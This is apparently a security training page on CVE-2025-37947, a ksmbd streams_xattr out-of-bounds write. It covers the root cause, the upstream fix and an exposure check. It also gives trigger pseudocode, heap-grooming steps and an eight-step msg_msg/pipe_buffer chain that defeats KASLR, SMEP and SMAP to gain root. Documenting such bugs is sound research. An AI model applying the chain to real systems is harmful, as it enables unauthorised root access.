ksmbd streams_xattr OOB write → local LPE (CVE-2025-37947)

{{#include ../../banners/hacktricks-training.md}}

This page documents a deterministic out-of-bounds write in ksmbd streams handling that enables a reliable Linux kernel privilege escalation on Ubuntu 22.04 LTS (5.15.0-153-generic), bypassing KASLR, SMEP, and SMAP using standard kernel heap primitives (msg_msg + pipe_buffer).

  • Affected component: fs/ksmbd/vfs.c, function ksmbd_vfs_stream_write()
  • Primitive: page-overflow OOB write past a 0x10000-byte kvmalloc() buffer
  • Preconditions: ksmbd running with an authenticated, writable share using vfs streams_xattr

Example smb.conf

[share]
    path = /share
    vfs objects = streams_xattr
    writeable = yes

Root cause (allocation clamped, memcpy at unclamped offset)
- The function computes size = pos + count, clamps size to XATTR_SIZE_MAX (0x10000) when exceeded, and recomputes count = (pos + count) - 0x10000, but still performs memcpy(&stream_buf[pos], buf, count) into a 0x10000-byte buffer. If pos ≥ 0x10000, the destination pointer is already outside the allocation, producing an OOB write of count bytes.
- streams_xattr stores SMB alternate data streams inside POSIX extended attributes, so the 0x10000 ceiling comes from the Linux single-xattr size limit rather than from an SMB protocol field. That makes the bug practical only when the share explicitly enables vfs objects = streams_xattr and the filesystem supports xattrs.
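
The size and count arithmetic described above can be modeled in userspace. The following is a minimal sketch, not kernel code: model_stream_write, struct write_model, and MODEL_XATTR_SIZE_MAX are hypothetical names, and the model ignores the existing stream length and only mirrors the clamp described in this section.

```c
#include <stddef.h>
#include <stdint.h>

#define MODEL_XATTR_SIZE_MAX 0x10000u /* Linux single-xattr size limit (64 KiB) */

/* Hypothetical result type: where the copy lands relative to the buffer. */
struct write_model {
    size_t alloc_size; /* bytes requested for the stream buffer */
    size_t copy_len;   /* bytes memcpy() is asked to copy */
    size_t oob_bytes;  /* bytes of the copy that fall past alloc_size */
};

/* Mirror the pre-fix size/count computation for a given pos and count. */
static struct write_model model_stream_write(uint64_t pos, size_t count)
{
    struct write_model m;
    uint64_t size = pos + count;

    if (size > MODEL_XATTR_SIZE_MAX) {
        size = MODEL_XATTR_SIZE_MAX;
        count = (size_t)((pos + count) - MODEL_XATTR_SIZE_MAX);
    }
    m.alloc_size = (size_t)size;
    m.copy_len = count;

    /* The copy covers [pos, pos + count); count what lies past the buffer. */
    uint64_t end = pos + count;
    if (end <= m.alloc_size)
        m.oob_bytes = 0;
    else if (pos >= m.alloc_size)
        m.oob_bytes = count;
    else
        m.oob_bytes = (size_t)(end - m.alloc_size);
    return m;
}
```

Calling model_stream_write(0x10018, 8) reports a 0x10000-byte buffer and a 0x20-byte copy that lies entirely out of bounds, while model_stream_write(0xFFF0, 0x20) stays inside the buffer.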

Why the write offset matters
- The vulnerable path is not just "write more than 64KiB". What was missing is a check of *pos against the current stream length (v_len) before the append/copy logic ran.
- Upstream fixed this by rejecting writes where *pos >= v_len with -EINVAL. Pre-fix, an attacker could reuse a valid authenticated handle to a named stream and send a raw SMB2 WRITE whose file_offset already points at or past the end of the existing stream, which turns the post-clamp memcpy() into a deterministic page overflow.
- The public PoC demonstrates this by authenticating with libsmb2, opening a stream path such as 1337:, extracting SessionId/TreeId/FileId, and then sending a handcrafted SMB2 WRITE with file_offset = 0x10018 and a small Length.
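
The validation described above can be sketched as a small userspace model. This is an illustration of the rule, not the upstream patch itself: check_stream_write_pos is a hypothetical name, and the negative-offset check is an added assumption for the standalone example.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Simplified model of the post-fix validation: a write whose offset is at or
 * past the current stream length is rejected before any copy takes place.
 * Returns 0 when the offset is acceptable, -EINVAL otherwise.
 */
static int check_stream_write_pos(int64_t pos, size_t v_len)
{
    /* The pos < 0 test is an assumption added for this standalone sketch. */
    if (pos < 0 || (uint64_t)pos >= v_len)
        return -EINVAL;
    return 0;
}
```

With this rule, the PoC offset 0x10018 against a short existing stream is refused before the clamp and memcpy are reached.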

Vulnerable function snippet (ksmbd_vfs_stream_write)
// https://elixir.bootlin.com/linux/v5.15/source/fs/ksmbd/vfs.c#L411
static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos, size_t count)
{
    char *stream_buf = NULL, *wbuf;
    size_t size;
    ...
    size = *pos + count;
    if (size > XATTR_SIZE_MAX) {             // [1] clamp allocation, but...
        size = XATTR_SIZE_MAX;
        count = (*pos + count) - XATTR_SIZE_MAX; // [1.1] ...recompute count
    }
    wbuf = kvmalloc(size, GFP_KERNEL | __GFP_ZERO); // [2] alloc 0x10000
    stream_buf = wbuf;
    memcpy(&stream_buf[*pos], buf, count);         // [3] OOB when *pos >= 0x10000
    ...
    kvfree(stream_buf);
    return err;
}

Offset steering and OOB length
- Example: set the file offset (pos) to 0x10018 and the original length (count) to 8. After clamping, count' = (0x10018 + 8) - 0x10000 = 0x20, so memcpy writes 32 bytes starting at stream_buf[0x10018]. The write begins 0x18 bytes past the end of the 16-page allocation and covers offsets 0x10018 through 0x10037.
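
The relation between the request fields and the resulting copy can be written down directly. For pos = 0x10000 + skip, the clamp gives count' = skip + count, so the copy length always exceeds the distance past the buffer. The sketch below only encodes that arithmetic; plan_write and STREAM_BUF_SIZE are hypothetical names introduced for illustration.

```c
#include <stdint.h>

#define STREAM_BUF_SIZE 0x10000u /* size of the clamped stream buffer */

/*
 * Hypothetical helper: compute the request fields for a write that starts
 * `skip` bytes past the buffer and copies `total` bytes. Returns 0 on
 * success, or -1 if the pair is unreachable (count' = skip + count, so
 * total must be larger than skip).
 */
static int plan_write(uint32_t skip, uint32_t total, uint64_t *pos, uint32_t *count)
{
    if (total <= skip)
        return -1;
    *pos = (uint64_t)STREAM_BUF_SIZE + skip;
    *count = total - skip;
    return 0;
}
```

For skip = 0x18 and total = 0x20 this yields pos = 0x10018 and count = 8, matching the example above.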

Triggering the bug via SMB streams write
- Use the same authenticated SMB connection to open a file on the share and issue a write to a named stream (streams_xattr). Set file_offset ≥ 0x10000 with a small length to generate a deterministic OOB write of controllable size.
- libsmb2 can be used to authenticate and craft such writes over SMB2/3.
- In practice, reusing the negotiated SMB session is convenient because the exploit only needs to patch a few dynamic fields in the WRITE request (TreeId, SessionId, FileId) and can then transmit the malformed packet directly on the same socket.

Minimal reachability (concept)

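// Pseudocode only: call names and arguments are simplified and may not match the real libsmb2 signatures.
// Send an SMB streams write with pos = 0x10018, len = 8.
smb2_session_login(...);
smb2_open("\\\\host\\share\\file:stream", ...);
smb2_pwrite(fd, payload, 8, 0x10018ULL); // count' = 0x20, so 32 bytes land out of bounds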

Allocator behavior and why page shaping is required
- Because 0x10000 exceeds KMALLOC_MAX_CACHE_SIZE, kvmalloc(0x10000, GFP_KERNEL|__GFP_ZERO) is served as an order-4 allocation (16 contiguous pages) from the buddy allocator. This is not a SLUB cache object.
- memcpy occurs immediately after allocation; post-allocation spraying is ineffective. You must pre-groom physical memory so that a chosen target lies immediately after the allocated 16-page block.
- On Ubuntu, GFP_KERNEL often pulls from the Unmovable migrate type in zone Normal. Exhaust order-3 and order-4 freelists to force the allocator to split an order-5 block into an adjacent order-4 + order-3 pair, then park an order-3 slab (kmalloc-cg-4k) directly after the stream buffer.
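
The order and adjacency reasoning above comes down to two small calculations. The sketch below assumes 4 KiB pages; order_for_size, buddy_pfn, and PAGE_SIZE_ASSUMED are names chosen for this example, written to behave like the kernel's order and buddy computations rather than copied from them.

```c
#include <stddef.h>

#define PAGE_SIZE_ASSUMED 4096u /* assumption: 4 KiB pages (x86_64 default) */

/* Smallest order such that (page size << order) >= size. */
static unsigned int order_for_size(size_t size)
{
    unsigned int order = 0;
    size_t span = PAGE_SIZE_ASSUMED;

    while (span < size) {
        span <<= 1;
        order++;
    }
    return order;
}

/* Page frame number of the buddy of the block that starts at pfn. */
static unsigned long buddy_pfn(unsigned long pfn, unsigned int order)
{
    return pfn ^ (1UL << order);
}
```

For instance, order_for_size(0x10000) is 4, and an order-4 block at the illustrative PFN 0x1000 has its buddy at PFN 0x1010, which is where an order-3 block split from the same order-5 parent can begin.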

Practical page shaping strategy
- Spray ~1000-2000 msg_msg objects of ~4096 bytes (fits kmalloc-cg-4k) to populate order-3 slabs.
- Receive some messages to punch holes and encourage adjacency.
- Trigger the ksmbd OOB repeatedly until the order-4 stream buffer lands immediately before a msg_msg slab. Use eBPF tracing to confirm addresses and alignment if available.

Useful observability

# Check per-order freelists and migrate types
sudo grep -E 'Node +0, zone +Normal' /proc/pagetypeinfo
# Example tracer (see reference repo) to log kvmalloc addresses/sizes
sudo ./bpf-tracer.sh
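
To watch the Unmovable order-3 and order-4 counts while tuning, the per-type rows of /proc/pagetypeinfo can also be parsed programmatically. The following is a minimal sketch: parse_pagetype_row and MAX_ORDERS are hypothetical names, and the row layout is assumed to be "Node N, zone Z, type T" followed by one free-block count per order.

```c
#include <stdio.h>
#include <stdlib.h>

#define MAX_ORDERS 11 /* assumption: orders 0..10, the common x86_64 default */

/*
 * Parse one "free pages" row of /proc/pagetypeinfo, e.g.
 *   "Node    0, zone   Normal, type    Unmovable   38   20 ..."
 * Fills zone, type, and the per-order counts. Returns the number of counts
 * read, or -1 if the line is not a per-type row.
 */
static int parse_pagetype_row(const char *line, char zone[16], char type[16],
                              unsigned long counts[MAX_ORDERS])
{
    int node, consumed = 0, n = 0;

    if (sscanf(line, "Node %d, zone %15[^,], type %15s%n",
               &node, zone, type, &consumed) != 3)
        return -1;

    const char *p = line + consumed;
    while (n < MAX_ORDERS) {
        char *end;
        unsigned long v = strtoul(p, &end, 10);
        if (end == p)
            break; /* no more numbers on this row */
        counts[n++] = v;
        p = end;
    }
    return n;
}
```

After a successful call, counts[3] and counts[4] hold the order-3 and order-4 free-block counts for that zone and migrate type.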

What to trace while tuning
- kvmalloc_node(0x10000) confirms when the vulnerable stream write actually consumes an order-4 allocation.
- load_msg/kretprobe:load_msg lets you estimate how many msg_msgseg allocations are attached to each sprayed message, which is useful when tuning primary/secondary message sizes for a specific kernel build.
- If the exploit is ported to a different distro/kernel, re-check cache names, inline msg_msg payload sizes, anon_pipe_buf_ops offsets, and gadget addresses rather than assuming the Ubuntu 22.04 LTS 5.15.0-153-generic constants still match.
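
When estimating how many msg_msgseg allocations a message produces, the split performed on message load can be modeled with plain arithmetic. This sketch assumes 4 KiB pages, a 48-byte struct msg_msg, and an 8-byte struct msg_msgseg (typical for x86_64, but worth re-checking per build); msgseg_count and primary_alloc_size are hypothetical helper names.

```c
#include <stddef.h>

#define PAGE_SZ        4096u /* assumption: 4 KiB pages */
#define MSG_HDR_SZ       48u /* assumption: sizeof(struct msg_msg) on x86_64 */
#define MSGSEG_HDR_SZ     8u /* assumption: sizeof(struct msg_msgseg) on x86_64 */

/* Number of msg_msgseg allocations that follow the primary msg_msg for a
 * message body of len bytes. */
static size_t msgseg_count(size_t len)
{
    const size_t first = PAGE_SZ - MSG_HDR_SZ;  /* body bytes held inline */
    const size_t seg = PAGE_SZ - MSGSEG_HDR_SZ; /* body bytes per segment */

    if (len <= first)
        return 0;
    return (len - first + seg - 1) / seg;
}

/* Size of the primary allocation: header plus the inline part of the body. */
static size_t primary_alloc_size(size_t len)
{
    const size_t first = PAGE_SZ - MSG_HDR_SZ;

    return MSG_HDR_SZ + (len < first ? len : first);
}
```

Under these assumptions a 4048-byte body fills exactly one 4096-byte allocation with no segments, which is consistent with the 4048 value that appears in the tracer output mentioned on this page.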

Exploitation plan (msg_msg + pipe_buffer), adapted from CVE-2021-22555
1) Spray many System V msg_msg primary/secondary messages (4KiB-sized to fit kmalloc-cg-4k).
2) Trigger ksmbd OOB to corrupt a primary message's next pointer so that two primaries share one secondary.
3) Detect the corrupted pair by tagging queues and scanning with msgrcv(MSG_COPY) to find mismatched tags.
4) Free the real secondary to create a UAF; reclaim it with controlled data via UNIX sockets (craft a fake msg_msg).
5) Leak kernel heap pointers by abusing m_ts over-read in copy_msg to obtain mlist.next/mlist.prev (SMAP bypass).
6) With an sk_buff spray, rebuild a consistent fake msg_msg with valid links and free it normally to stabilize state.
7) Reclaim the UAF with struct pipe_buffer objects; leak anon_pipe_buf_ops to compute kernel base (defeat KASLR).
8) Spray a fake pipe_buf_operations with release pointing to a stack pivot/ROP gadget; close pipes to execute and gain root.
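
The detection logic in step 3 reduces to comparing the tag read back through each queue with the tag that queue was given. The sketch below models only that comparison on an array of already-collected tags; find_corrupted_queue is a hypothetical name, and tagging queue i with the value i is an assumption made for the example.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * observed[i] is the tag read back from the secondary message reached through
 * queue i; queue i was originally tagged with the value i (assumption).
 * Returns the index of the first queue whose secondary carries another
 * queue's tag, or -1 if every tag matches.
 */
static long find_corrupted_queue(const uint32_t *observed, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (observed[i] != (uint32_t)i)
            return (long)i;
    }
    return -1;
}
```

If the function returns index 3 and observed[3] is 7, queues 3 and 7 are the pair that now share one secondary message.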

Bypasses and notes
- KASLR: leak anon_pipe_buf_ops, compute base (kbase_addr) and gadget addresses.
- SMEP/SMAP: execute ROP in kernel context via pipe_buf_operations->release flow; avoid userspace derefs until after disable/prepare_kernel_cred/commit_creds chain.
- Hardened usercopy: not applicable to this page overflow primitive; corruption targets are non-usercopy fields.
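
The KASLR step is a subtraction followed by a sanity check. In the sketch below every offset is supplied by the caller and must come from the target build's symbols; the function names are hypothetical, and the 2 MiB alignment test assumes the default x86_64 CONFIG_PHYSICAL_ALIGN.

```c
#include <stdint.h>

/* Kernel base = leaked symbol address minus that symbol's offset from base. */
static uint64_t kernel_base_from_leak(uint64_t leaked_ops, uint64_t ops_offset)
{
    return leaked_ops - ops_offset;
}

/* Assumption: the image is 2 MiB aligned and mapped at or above
 * 0xffffffff80000000, as on default x86_64 configurations. */
static int base_looks_sane(uint64_t base)
{
    return (base & 0x1fffffULL) == 0 && base >= 0xffffffff80000000ULL;
}

/* Runtime address of any other symbol, given its offset from the base. */
static uint64_t rebase(uint64_t base, uint64_t symbol_offset)
{
    return base + symbol_offset;
}
```

Rejecting a base that fails base_looks_sane is a cheap way to notice that the leaked value was not the expected anon_pipe_buf_ops pointer before any gadget address is derived from it.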

Reliability
- High once adjacency is achieved; occasional misses or panics (<10%). Tuning spray/free counts improves stability. Overwriting the two least-significant bytes of a pointer to induce specific collisions was reported as effective (e.g., writing the pattern 0x0000_0000_0000_0500 into the overlap).

Key parameters to tune
- Number of msg_msg sprays and hole pattern
- OOB offset (pos) and resulting OOB length (count')
- Number of UNIX socket, sk_buff, and pipe_buffer sprays during each stage

Mitigations and reachability
- Fix: clamp both the allocation and the destination offset/length, or bound the memcpy against the allocated size; the upstream patch is tracked as CVE-2025-37947.
- Remote exploitation would additionally require a reliable infoleak and remote heap grooming; this write-up focuses on local LPE.
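
Because the bug is reachable only when a share enables streams_xattr, a quick exposure check is to scan the server configuration for that setting. The following is a minimal sketch of the per-line test: line_enables_streams_xattr is a hypothetical name, and the match is case-sensitive and expects the exact spelling "vfs objects", which is a simplification.

```c
#include <ctype.h>
#include <string.h>

/*
 * Return 1 if a single config line sets "vfs objects" to a value that
 * contains streams_xattr, 0 otherwise. Comment lines (# or ;) are ignored.
 */
static int line_enables_streams_xattr(const char *line)
{
    while (isspace((unsigned char)*line))
        line++;
    if (*line == '#' || *line == ';')
        return 0;
    if (strncmp(line, "vfs objects", 11) != 0)
        return 0;

    const char *eq = strchr(line, '=');
    return eq != NULL && strstr(eq + 1, "streams_xattr") != NULL;
}
```

Feeding each line of the configuration file through this function and reporting the enclosing share name gives a list of shares that meet the precondition.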

See also

{{#ref}}
../../network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md
{{#endref}}

References PoC and tooling
- libsmb2 for SMB auth and streams writes
- eBPF tracer script to log kvmalloc addresses and histogram allocations (e.g., grep 4048 out-4096.txt)
- Minimal reachability PoC and full local exploit are publicly available (see References)

References

{{#include ../../banners/hacktricks-training.md}}